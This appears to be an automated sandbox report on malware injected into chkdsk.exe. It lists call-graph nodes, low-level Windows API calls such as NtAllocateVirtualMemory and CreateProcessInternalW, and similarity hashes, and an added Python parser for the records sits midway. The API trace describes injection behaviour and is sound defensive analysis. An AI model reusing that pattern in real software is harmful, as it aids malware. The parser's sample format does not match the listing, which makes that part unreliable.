cf43e 82188 cf280 3 API calls 82187->82188 82189 cf44f 82188->82189 82190 cf459 82189->82190 82191 cf471 82189->82191 82192 cf464 82190->82192 82194 da450 2 API calls 82190->82194 82193 cf482 82191->82193 82195 da450 2 API calls 82191->82195 82192->81708 82193->81708 82194->82192 82195->82193 82197 cca96 82196->82197 82198 ccaa0 82196->82198 82197->81717 82199 caf00 LdrLoadDll 82198->82199 82200 ccb3e 82199->82200 82201 ccb64 82200->82201 82202 cb030 LdrLoadDll 82200->82202 82201->81717 82203 ccb80 82202->82203 82204 d4a40 8 API calls 82203->82204 82205 ccbd5 82204->82205 82205->81717 82207 cd636 82206->82207 82208 cb030 
LdrLoadDll 82207->82208 82209 cd64a 82208->82209 82266 cd300 82209->82266 82211 c908b 82212 ccbf0 82211->82212 82213 ccc16 82212->82213 82214 cb030 LdrLoadDll 82213->82214 82215 ccc99 82213->82215 82214->82215 82216 cb030 LdrLoadDll 82215->82216 82217 ccd06 82216->82217 82218 caf00 LdrLoadDll 82217->82218 82219 ccd6f 82218->82219 82220 cb030 LdrLoadDll 82219->82220 82221 cce1f 82220->82221 82221->81729 82295 cf6c0 82222->82295 82224 c8f25 82224->81688 82225 c8d14 82225->82224 82300 d4390 82225->82300 82227 c8d70 82227->82224 82303 c8ab0 82227->82303 82230 dcef0 2 API calls 82231 c8db2 82230->82231 82232 dd020 3 API calls 82231->82232 82236 c8dc7 82232->82236 82233 c7ea0 4 API calls 82233->82236 82236->82224 82236->82233 82237 cc7a0 18 API calls 82236->82237 82238 c8160 2 API calls 82236->82238 82308 cf660 82236->82308 82312 cf070 21 API calls 82236->82312 82237->82236 82238->82236 82239->81710 82240->81735 82241->82171 82243 cf350 82242->82243 82244 cf29a 82242->82244 82243->82178 82243->82179 82245 cb030 LdrLoadDll 82244->82245 82246 cf2bc 82245->82246 82252 d9f00 82246->82252 82248 cf2fe 82256 d9f40 82248->82256 82251 da450 2 API calls 82251->82243 82253 d9f16 82252->82253 82254 daf20 LdrLoadDll 82253->82254 82255 d9f1c 82254->82255 82255->82248 82257 d9f5c 82256->82257 82258 daf20 LdrLoadDll 82256->82258 82261 20107ac LdrInitializeThunk 82257->82261 82258->82257 82259 cf344 82259->82251 82261->82259 82263 cb2aa 82262->82263 82264 cb030 LdrLoadDll 82263->82264 82265 cb303 82264->82265 82265->82187 82267 cd317 82266->82267 82275 cf700 82267->82275 82271 cd38b 82272 cd392 82271->82272 82286 da260 LdrLoadDll 82271->82286 82272->82211 82274 cd3a5 82274->82211 82276 cf725 82275->82276 82287 c81a0 82276->82287 82278 cd35f 82283 da6a0 82278->82283 82279 d4a40 8 API calls 82281 cf749 82279->82281 82281->82278 82281->82279 82282 dbd80 2 API calls 82281->82282 82294 cf540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 82281->82294 82282->82281 82284 da6bf 
CreateProcessInternalW 82283->82284 82285 daf20 LdrLoadDll 82283->82285 82284->82271 82285->82284 82286->82274 82288 c829f 82287->82288 82289 c81b5 82287->82289 82288->82281 82289->82288 82290 d4a40 8 API calls 82289->82290 82291 c8222 82290->82291 82292 dbd80 2 API calls 82291->82292 82293 c8249 82291->82293 82292->82293 82293->82281 82294->82281 82296 cf6df 82295->82296 82297 d4e40 LdrLoadDll 82295->82297 82298 cf6ed 82296->82298 82299 cf6e6 SetErrorMode 82296->82299 82297->82296 82298->82225 82299->82298 82302 d43b6 82300->82302 82313 cf490 82300->82313 82302->82227 82304 dbd00 2 API calls 82303->82304 82307 c8ad5 82303->82307 82304->82307 82305 c8cea 82305->82230 82307->82305 82332 d9840 82307->82332 82309 cf673 82308->82309 82380 d9e50 82309->82380 82312->82236 82314 cf4ad 82313->82314 82320 d9f80 82314->82320 82317 cf4f5 82317->82302 82321 d9f9c 82320->82321 82322 daf20 LdrLoadDll 82320->82322 82330 200ffb4 LdrInitializeThunk 82321->82330 82322->82321 82323 cf4ee 82323->82317 82325 d9fd0 82323->82325 82326 daf20 LdrLoadDll 82325->82326 82327 d9fec 82326->82327 82331 200fc60 LdrInitializeThunk 82327->82331 82328 cf51e 82328->82302 82330->82323 82331->82328 82333 dbf50 2 API calls 82332->82333 82334 d9857 82333->82334 82353 c9310 82334->82353 82336 d9872 82337 d9899 82336->82337 82338 d98b0 82336->82338 82339 dbd80 2 API calls 82337->82339 82340 dbd00 2 API calls 82338->82340 82341 d98a6 82339->82341 82342 d98ea 82340->82342 82341->82305 82343 dbd00 2 API calls 82342->82343 82344 d9903 82343->82344 82350 d9ba4 82344->82350 82359 dbd40 LdrLoadDll 82344->82359 82346 d9b89 82347 d9b90 82346->82347 82346->82350 82348 dbd80 2 API calls 82347->82348 82349 d9b9a 82348->82349 82349->82305 82351 dbd80 2 API calls 82350->82351 82352 d9bf9 82351->82352 82352->82305 82354 c9335 82353->82354 82355 cace0 LdrLoadDll 82354->82355 82356 c9368 82355->82356 82358 c938d 82356->82358 82360 ccf10 82356->82360 82358->82336 82359->82346 82361 ccf3c 82360->82361 82362 da1a0 LdrLoadDll 
82361->82362 82363 ccf55 82362->82363 82364 ccf5c 82363->82364 82371 da1e0 82363->82371 82364->82358 82368 ccf97 82369 da450 2 API calls 82368->82369 82370 ccfba 82369->82370 82370->82358 82372 daf20 LdrLoadDll 82371->82372 82373 da1fc 82372->82373 82379 200fbb8 LdrInitializeThunk 82373->82379 82374 ccf7f 82374->82364 82376 da7d0 82374->82376 82377 daf20 LdrLoadDll 82376->82377 82378 da7ef 82377->82378 82378->82368 82379->82374 82381 daf20 LdrLoadDll 82380->82381 82382 d9e6c 82381->82382 82385 200fd8c LdrInitializeThunk 82382->82385 82383 cf69e 82383->82236 82385->82383 82387 d9040 82388 dbd00 2 API calls 82387->82388 82390 d907b 82387->82390 82388->82390 82389 d915c 82390->82389 82391 cace0 LdrLoadDll 82390->82391 82392 d90b1 82391->82392 82393 d4e40 LdrLoadDll 82392->82393 82395 d90cd 82393->82395 82394 d90e0 Sleep 82394->82395 82395->82389 82395->82394 82398 d8c60 LdrLoadDll 82395->82398 82399 d8e70 LdrLoadDll 82395->82399 82398->82395 82399->82395

Control-flow Graph
• 243: da3ca-da3ce -> 244, 245
• 244: da426-da449 (call daf20)
• 245: da3d1-da419 (call daf20, NtReadFile)
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000DA415
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !J$mK
                                  • API String ID: 2738559852-2694220420
                                  • Opcode ID: cc1a5caa438b4077c69265ee7044e14f5808b96c11d54c474f95ad02f58022d0
                                  • Instruction ID: f804c8201bb02d07c3e25c7b8e37c9ede7840616410246d89af2f2e949d89030
                                  • Opcode Fuzzy Hash: cc1a5caa438b4077c69265ee7044e14f5808b96c11d54c474f95ad02f58022d0
                                  • Instruction Fuzzy Hash: 590129B2200214AFCB14DF98DC85EEB77ADEF8C714F058659BA1D97241C630E911CBB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

Control-flow Graph
• 291: da320-da371 (call daf20, NtCreateFile)
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000DA36D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: 1bfa10e3faee7791774820e63c42ca3d0b2d757105d0aa3ec970af5c21c03481
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: A8F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

Control-flow Graph
• 294: da3d0-da3e6 -> 295, 296
• 295: da3ec-da419 (NtReadFile)
• 296: da3e7 (call daf20) -> 295
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000DA415
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !J
                                  • API String ID: 2738559852-3001626359
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: ad74e15f3fd307556c897afc5ac714aa2a4d6fa41f11e1eb9c28cc7018f46207
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: 0EF0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158259BA1D97241D630E8118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

Control-flow Graph
• 306: da450-da466 -> 307, 308
• 307: da46c-da479 (NtClose)
• 308: da467 (call daf20) -> 307
                                  APIs
                                  • NtClose.NTDLL(@M,?,?,000D4D40,00000000,FFFFFFFF), ref: 000DA475
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: Close
                                  • String ID: @M
                                  • API String ID: 3535843008-3032291623
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: de6f758c108df2676504686597ef287f8484cdd2a1d44d8bd507fdab3fdd9ae9
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 5DD01776200314ABD710EBD8DC85FE77BACEF48760F1544A9BA189B242C530FA0086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

Control-flow Graph
• 309: da44b-da479 (call daf20, NtClose)
                                  APIs
                                  • NtClose.NTDLL(@M,?,?,000D4D40,00000000,FFFFFFFF), ref: 000DA475
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: Close
                                  • String ID: @M
                                  • API String ID: 3535843008-3032291623
                                  • Opcode ID: da2f2a09bd1995a3dd4a76507012b4aea431bae2938b2126c55502600cb5ce75
                                  • Instruction ID: c3453fc2a3ec13bb89aa51b14ce234f514b6243dbedacf0c8187324c7de097e5
                                  • Opcode Fuzzy Hash: da2f2a09bd1995a3dd4a76507012b4aea431bae2938b2126c55502600cb5ce75
                                  • Instruction Fuzzy Hash: A6D0C2AE0092804BCB10EAB464C10C27B40DE512183251D8EE4A44B703C124D606A3A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA539
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 9f9fd06c6a323a8ded80df0213e56d2d7389a686948efba7f95ea834e3d92d1b
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: 38F015B2200208ABCB14DF89DC81EEB77ADEF88754F118159BE0897241C630F810CBB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
• Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                  Uniqueness

                                  Uniqueness Score: -1.00%
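The per-function records in this listing (API calls with their ref addresses, the Memory Dump Source line, the Similarity hashes and the control_flow_graph dumps) are far easier to pivot on across samples once they are parsed into structured data. The following is an added example and not Joe Sandbox code: a small Python parser for the record layout exactly as it is rendered on this page, run over a constructed three-record excerpt copied from this listing. The helper names (parse_records, numeric_args, api_summary, regions) and the dictionary keys are this example's own choices.

```python
"""Parse per-function records from a Joe Sandbox disassembly listing.

Added example, not Joe Sandbox code. It assumes the record layout as rendered
on this page: bullet lines under "APIs", "Memory Dump Source" and "Similarity",
an optional control_flow_graph dump, and "Uniqueness Score" closing each record.
"""
import re
from collections import defaultdict

# Constructed excerpt: three abridged records copied from this listing.
SAMPLE = """\
control_flow_graph 294 da3d0-da3e6 295 da3ec-da419 NtReadFile 294->295 296 da3e7 call daf20 294->296 296->295
APIs
• NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000DA415
Memory Dump Source
• Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
• Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
Similarity
• API ID: FileRead
• Instruction Fuzzy Hash: 0EF0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158259BA1D97241D630E8118BA4
Uniqueness Score: -1.00%
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA539
Memory Dump Source
• Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
Similarity
• API ID: AllocateMemoryVirtual
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
• Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Similarity
• API ID: InitializeThunk
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
BLOCK_RE = re.compile(r"\b(\d+) ([0-9a-f]{4,})(?:-([0-9a-f]{4,}))?")   # "295 da3ec-da419"
EDGE_RE = re.compile(r"(\d+)->(\d+)")                                    # "294->295"
FIELDS = ("Snapshot File", "API ID", "String ID", "API String ID", "Opcode ID",
          "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")


def _new_record():
    return {"apis": [], "associated": [], "blocks": {}, "edges": []}


def parse_records(text):
    """Split the listing into one dict per function record."""
    records, rec = [], _new_record()
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line.startswith("Uniqueness Score:"):          # closes a record
            rec["uniqueness_score"] = float(line.split(":", 1)[1].strip().rstrip("%"))
            records.append(rec)
            rec = _new_record()
        elif line.startswith("control_flow_graph"):       # basic blocks and edges
            rec["blocks"] = {int(i): (int(s, 16), int(e or s, 16))
                             for i, s, e in BLOCK_RE.findall(line)}
            rec["edges"] = [(int(a), int(b)) for a, b in EDGE_RE.findall(line)]
        elif m := API_RE.match(line):                     # "Name.MODULE(args), ref: addr"
            name, module, args, ref = m.groups()
            rec["apis"].append({"name": name, "module": module,
                                "args": args.split(","), "ref": int(ref, 16)})
        elif m := SRC_RE.match(line):
            rec["source_file"] = m.group(1)
            rec["offset"] = int(m.group(2), 16)
            rec["based_on_pe"] = m.group(3) == "true"
        elif line.startswith("Associated: "):
            # the rendered page fuses the "Download File" link text onto the name
            rec["associated"].append(line[len("Associated: "):].removesuffix("Download File"))
        else:
            for field in FIELDS:
                if line.startswith(field + ": "):
                    rec[field.lower().replace(" ", "_")] = line[len(field) + 2:]
                    break
    return records


def numeric_args(api):
    """Hex arguments as ints, in the report's display order; '?' and string
    fragments such as '!J' become None."""
    return [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else None for a in api["args"]]


def api_summary(records):
    """Map each API name to the sorted call sites (ref addresses) that reach it."""
    sites = defaultdict(set)
    for rec in records:
        for api in rec["apis"]:
            sites[api["name"]].add(api["ref"])
    return {name: sorted(refs) for name, refs in sites.items()}


def regions(records):
    """Count records per dump region, separating the code at 0xC0000 from the
    region at 0x1FF0000 that the report marks 'based on PE: true'."""
    counts = defaultdict(int)
    for rec in records:
        counts[rec["offset"]] += 1
    return dict(counts)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print({k: [hex(r) for r in v] for k, v in api_summary(recs).items()}, regions(recs))
```

numeric_args keeps the values in the order the report displays them and deliberately does not map them onto the NT API's formal parameters: the NtAllocateVirtualMemory line above shows nine values while the function takes six, so the listing reflects the stack at the call site rather than a decoded prototype. The Instruction Fuzzy Hash field is the one worth collecting for cross-sample pivoting, since it survives relocation of the injected code while the Opcode ID does not.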

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
• Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
• Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
• Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
• Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
